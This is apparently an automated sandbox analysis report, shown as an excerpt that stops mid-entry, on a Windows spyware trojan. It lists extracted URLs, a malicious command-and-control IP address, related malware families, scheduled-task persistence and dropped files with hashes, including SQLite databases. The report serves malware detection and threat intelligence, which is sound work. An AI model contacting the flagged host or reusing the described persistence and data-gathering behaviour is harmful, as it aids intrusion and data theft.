                      https://ac.ecosia.org/autocomplete?q=lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/SetEnvironmentdelZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ipify.orgcookies//settinString.RemoveglZ8NRWShfC.exe, lZ8NRWShfC.exe, 00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1858249007.0000000004399000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressinglZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponselZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchlZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponselZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/Endpoint/VerifyUpdatelZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/0lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelZ8NRWShfC.exe, 00000000.00000002.1761163536.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000A.00000002.1856342329.0000000003389000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.222.58.91:5TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1880037858.0000000003BF1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1972529480.0000000003D80000.00000004.00000800.00020000.00000000.sdmp, tmp3C74.tmp.14.dr, tmp526.tmp.14.dr, tmp516.tmp.14.dr, tmp73A6.tmp.14.dr, tmp3C85.tmp.14.dr, tmp50CB.tmp.8.dr, tmp3CB5.tmp.14.dr, tmp509A.tmp.8.dr, tmp50DB.tmp.8.dr, tmp8760.tmp.8.dr, tmp1959.tmp.8.dr, tmp73B7.tmp.14.dr, tmp7386.tmp.14.dr, tmp3C64.tmp.14.dr, tmp8750.tmp.8.dr, tmpAA2B.tmp.14.dr, tmp872E.tmp.8.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/soap/actor/nextlZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.222.58.91
                      		unknownNetherlands
                      		51447ROOTLAYERNETNLtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1467127
                      Start date and time:2024-07-03 18:16:18 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 48s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:20
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:lZ8NRWShfC.exe
                      renamed because original name is a hash value
                      Original Sample Name:3599fa63d78413242a88966d3b4b14ef.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@23/99@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 114
                      • Number of non-executed functions: 6
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: lZ8NRWShfC.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      12:17:08API Interceptor40x Sleep call for process: lZ8NRWShfC.exe modified
                      12:17:15API Interceptor38x Sleep call for process: powershell.exe modified
                      12:17:18API Interceptor44x Sleep call for process: TmfmVKU.exe modified
                      17:17:16Task SchedulerRun new task: TmfmVKU path: C:\Users\user\AppData\Roaming\TmfmVKU.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.222.58.91PURCHASE ORDER_203974.exeGet hashmaliciousNjratBrowse
                      • 185.222.58.91/Czsbc.bmp

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ROOTLAYERNETNL1ppvR5VRT6.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      Documents.com.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      27062024-322copy.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      Jailkeeper.bat.exeGet hashmaliciousGuLoaderBrowse
                      • 185.222.58.113
                      v1JxTE3aw1.exeGet hashmaliciousRedLineBrowse
                      • 185.222.58.234
                      GLslDiEqwx.exeGet hashmaliciousRedLineBrowse
                      • 185.222.58.79
                      oIZhm8seZB.exeGet hashmaliciousRedLineBrowse
                      • 185.222.58.70
                      FbfKnwuoXd.exeGet hashmaliciousRedLineBrowse
                      • 185.222.58.70

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TmfmVKU.exe.log

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lZ8NRWShfC.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\lZ8NRWShfC.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:true
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2232
                      Entropy (8bit):5.379460230152629
                      Encrypted:false
                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YUyus:fLHyIFKL3IZ2KRH9Oug8s
                      MD5:FC2D360EC9CA945C562E3B5C1685B424
                      SHA1:4B69CCEDE2E97E9F699C76EE0148C105E7D6FFA4
                      SHA-256:7BB70E950D7A4B6C6047A44D4F722245B5E872228CF58FA2005FEE27979C25CF
                      SHA-512:2C22E9797C5124D72B70493DBD64AA9C331A5B647BD2A0AD3E46DB8AAF10CFE3AD9274E525F83B19A8EDBC4E419DCCA32BA081E8D8D5D1F0D14A57639B0C50AD
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52msmxeb.01u.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mmr1ppu.3wj.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adcjjee3.3pg.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzweimg5.oh3.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei23xkxp.33v.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3n1e3u5.zyf.psm1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp5q1iad.nxt.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tft0euiy.3mh.ps1

                      Download File
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                      C:\Users\user\AppData\Local\Temp\tmp1651.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1662.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1673.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1683.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                      Category:dropped
                      Size (bytes):114688
                      Entropy (8bit):0.9746603542602881
                      Encrypted:false
                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                      Malicious:false
                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp1694.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmp16B4.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\TmfmVKU.exe
